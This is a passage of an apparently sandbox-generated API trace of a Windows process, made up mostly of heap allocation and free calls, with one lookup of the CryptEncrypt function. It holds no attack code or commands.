dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0208.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0208.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0208.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0208.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0208.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0208.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0208.770] CharLowerBuffW (in: lpsz="byte[81816]", cchLength=0xb | out: lpsz="byte[81816]") returned 0xb [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2e942d0 [0208.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0208.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0208.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0208.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0208.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2ea8270 [0208.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0208.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2ebc210 [0208.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0208.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0208.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0208.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0208.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.780] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0208.780] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0208.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0208.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0208.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0208.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0208.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0208.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0208.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50cb0 [0208.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50cb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.842] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54260 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0208.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0208.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 